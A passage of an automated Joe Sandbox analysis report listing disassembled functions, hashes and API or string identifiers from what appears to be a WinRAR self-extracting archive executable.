                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 9782f85efb0ae2e1c0b67e86eaa04f67255253bd9529923cb00556c4c2cc06da
                                                                                                                                                                                                                                                        • Instruction ID: cee01f8a48c5c2f4611e8bb3670358f91ab5c4b14674bb5bcb8a557c4f95061a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9782f85efb0ae2e1c0b67e86eaa04f67255253bd9529923cb00556c4c2cc06da
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F613722B182D24DEB02CF7585404FDBFA1EB197847559032DE9BD364ACE7EE106CB90
                                                                                                                                                                                                                                                        Function 00007FF6063B8DF0 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 925daada8ef65e2677460b522fd56a987e460062fe4befbd33bf430193fcb847
                                                                                                                                                                                                                                                        • Instruction ID: d396a16ea13d35dc6df8d3a0367c13d729b61ae9bbd4b122f09f959b2c208b7b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 925daada8ef65e2677460b522fd56a987e460062fe4befbd33bf430193fcb847
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AF09671B286958BDBA9CF2DA84262977D0F7083C0F909039E68DC3B44DF3D94618F54
                                                                                                                                                                                                                                                        Function 00007FF6063A6B24 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 915a11522949b389e451a5ed0c02c5f26bdaa58b853bb1385cc96cba591218a7
                                                                                                                                                                                                                                                        • Instruction ID: d67e3526b6def376074c77ccda5fb8cc09aea2f686ac96260a3f6e20d326eb36
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 915a11522949b389e451a5ed0c02c5f26bdaa58b853bb1385cc96cba591218a7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A7A0023590CD12D2EA4C8B01EC65130A330FF61700BA43131E55EC10A1DF3EA440D380
                                                                                                                                                                                                                                                        Function 00007FF6063A61E0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                                                                                                                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                        • API String ID: 2565136772-3242537097
                                                                                                                                                                                                                                                        • Opcode ID: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
                                                                                                                                                                                                                                                        • Instruction ID: fc84f248f244fc59010b904f1c21c1056224f81ad32c6f8d3a9024e34fdc09e6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 029695a6267facf631d40e22352065ea960f1d0c33bf652913798791beb6e733
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9212A30E0DA0782FE5E9F21ED5627562A0AF55B40F6C3435DA1F826A0EF2EA4459390
                                                                                                                                                                                                                                                        Function 00007FF60639DF84 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                                                                                                                                                                                        • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                                                                                                                                                                                        • API String ID: 431506467-1315819833
                                                                                                                                                                                                                                                        • Opcode ID: a5c1420563de154322e58b961742644a218078f87695e0f8e231236245ab560e
                                                                                                                                                                                                                                                        • Instruction ID: 91a012297239e2cbf06cc6f9095e10f541c8ac5c9f32cdca5fe59e574ce0c5ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a5c1420563de154322e58b961742644a218078f87695e0f8e231236245ab560e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2B1C262F18B4285FF04DB64D4842AC2362EF85398F206235DE5DA6AD9DF3EE545C390
                                                                                                                                                                                                                                                        Function 00007FF60639AB10 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 204memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                                                                                                                                                                                                                                        • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                                                                                                                                                                                                        • API String ID: 2868844859-1533471033
                                                                                                                                                                                                                                                        • Opcode ID: f0895581c817e55a58f121f9c0f6f66dd55f3ddbc4a2fb8a2d625ca181ef1552
                                                                                                                                                                                                                                                        • Instruction ID: ae148a20c4138b59ff4c81f7726bf0b6dd131132fc5e85fb677d7fadedfa54aa
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0895581c817e55a58f121f9c0f6f66dd55f3ddbc4a2fb8a2d625ca181ef1552
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3819C62F18A4285FB18DBA5D4402ED3371EF44798F602236DE1D97A9AEF3ED506C390
                                                                                                                                                                                                                                                        Function 00007FF6063B1B60 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                                                        • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                                                        • Opcode ID: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
                                                                                                                                                                                                                                                        • Instruction ID: 42a9f51f7664471acf7615530d53413b963c8bb939e2987c5bfef3c64d5bad74
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7e5ce1446c841e33a66cfbd311af876c7b34449f0d6954941b6492f47989c701
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A417C32A09F4589EB08CB25E8517AD37A4EB14798F64653AEF5C87B54DE3ED025C380
                                                                                                                                                                                                                                                        Function 00007FF6063A2EE0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85windowCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                                                                                                                                                                                                                                        • String ID: STATIC
                                                                                                                                                                                                                                                        • API String ID: 2845197485-1882779555
                                                                                                                                                                                                                                                        • Opcode ID: a56abbe028ef3f0b7d15def6da20f662c50af87d749574eaec9b76d17f79dad6
                                                                                                                                                                                                                                                        • Instruction ID: 474d96cadb4d1963eabbdc5afb4ef8595444df5aa963990e26a4fe355ce619c3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a56abbe028ef3f0b7d15def6da20f662c50af87d749574eaec9b76d17f79dad6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A931D435B0964246FB28DB11E8107BA6391FF89BC4F642034DD4E87795DF3EE9068B90
                                                                                                                                                                                                                                                        Function 00007FF6063880B0 Relevance: 14.4, APIs: 6, Strings: 2, Instructions: 444COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                                                                                                                                                                                                                                        • String ID: UNC$\\?\
                                                                                                                                                                                                                                                        • API String ID: 4097890229-253988292
                                                                                                                                                                                                                                                        • Opcode ID: 627c07d53eccfe150ff9c499ac3b11f54613392915993c7d05f5251deab33fae
                                                                                                                                                                                                                                                        • Instruction ID: 01d9af969c234112acc12429d13104d5b1424fc0eeed23068c00a74257392ddd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 627c07d53eccfe150ff9c499ac3b11f54613392915993c7d05f5251deab33fae
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1C12DF22B19B4288EF18CB64D4401ED6371EB81B98FA06231DA5DC7BE9DFBED545C380
                                                                                                                                                                                                                                                        Function 00007FF60639E9E0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ItemTextWindow
                                                                                                                                                                                                                                                        • String ID: LICENSEDLG
                                                                                                                                                                                                                                                        • API String ID: 2478532303-2177901306
                                                                                                                                                                                                                                                        • Opcode ID: 413809c6c529f907a05a51e37b96b30026af9f7a13d4bd8aebdb5ec3f6628f42
                                                                                                                                                                                                                                                        • Instruction ID: 74f266885b2afbfca42d19ba5658e85ef89387053fe7df0d1bd3d682bc2fcb5d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 413809c6c529f907a05a51e37b96b30026af9f7a13d4bd8aebdb5ec3f6628f42
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66419F25A0CA5282FB1CCB51E84477923A0FF84B94F246135D90E87BA4DF7EAA458B90
                                                                                                                                                                                                                                                        Function 00007FF60638BD30 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressProc$CurrentDirectoryProcessSystem
                                                                                                                                                                                                                                                        • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                                                                                                        • API String ID: 2915667086-2207617598
                                                                                                                                                                                                                                                        • Opcode ID: df634e7e6220f0fab9136f3d9598b6958fd483239d44fb29bf155b66aa12a787
                                                                                                                                                                                                                                                        • Instruction ID: a8378b6c08bab478aa030a3026926a06edd1dd9b671d123bf4cdf35744d67ea7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df634e7e6220f0fab9136f3d9598b6958fd483239d44fb29bf155b66aa12a787
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C315720E09B4389FA1C8F12B8901B5A7A0EF45B90F657135DA5FC37A4EEBEE445C380
                                                                                                                                                                                                                                                        Function 00007FF60639C414 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 415COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                        • String ID: $
                                                                                                                                                                                                                                                        • API String ID: 3668304517-227171996
                                                                                                                                                                                                                                                        • Opcode ID: c8965c4f87891568c389f61817c83666d92bf9a7bc58ebf4ca93cead553343d7
                                                                                                                                                                                                                                                        • Instruction ID: 633f620d545be929e557ecdb0967f28af1d14a30ff097edc66f289c595373443
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c8965c4f87891568c389f61817c83666d92bf9a7bc58ebf4ca93cead553343d7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9F1F062F18B4280EE089B65D0441BD6362EB45BACF607631CA5D937E9DF7EE580C7E0
                                                                                                                                                                                                                                                        Function 00007FF6063A8D7C Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff606380000_#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                        • API String ID: 2940173790-393685449
                                                                                                                                                                                                                                                        • Opcode ID: 7ce8224d02cbc9d10e697210102f736983d510ff4da2607681883173542701a8
                                                                                                                                                                                                                                                        • Instruction ID: 63a8d0ab4fbd1b73de9a247767f3815f2ec623da6403dede21c0d020d096aa28
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ce8224d02cbc9d10e697210102f736983d510ff4da2607681883173542701a8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 14E1C232A187828AEF189F34D4803BD77A0FB45748F202136DA8D97796CF3AE581D780
                                                                                                                                                                                                                                                        Function 00007FF606391BF4 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 160COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606390AA0: CompareStringW.KERNEL32(?,?,00007FF606386C19), ref: 00007FF606390ABF
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6063812BC: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6063813B6
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF606390AD0: CompareStringW.KERNEL32 ref: 00007FF606390B36
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF606391DC2
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF606391DC8
                                                                                                                                                                                                                                                        • swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF606391E25
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2105841120.00007FF606381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF606380000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105818881.00007FF606380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105885969.00007FF6063BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2105917030.00007FF6063D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2106030102.00007FF6063EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
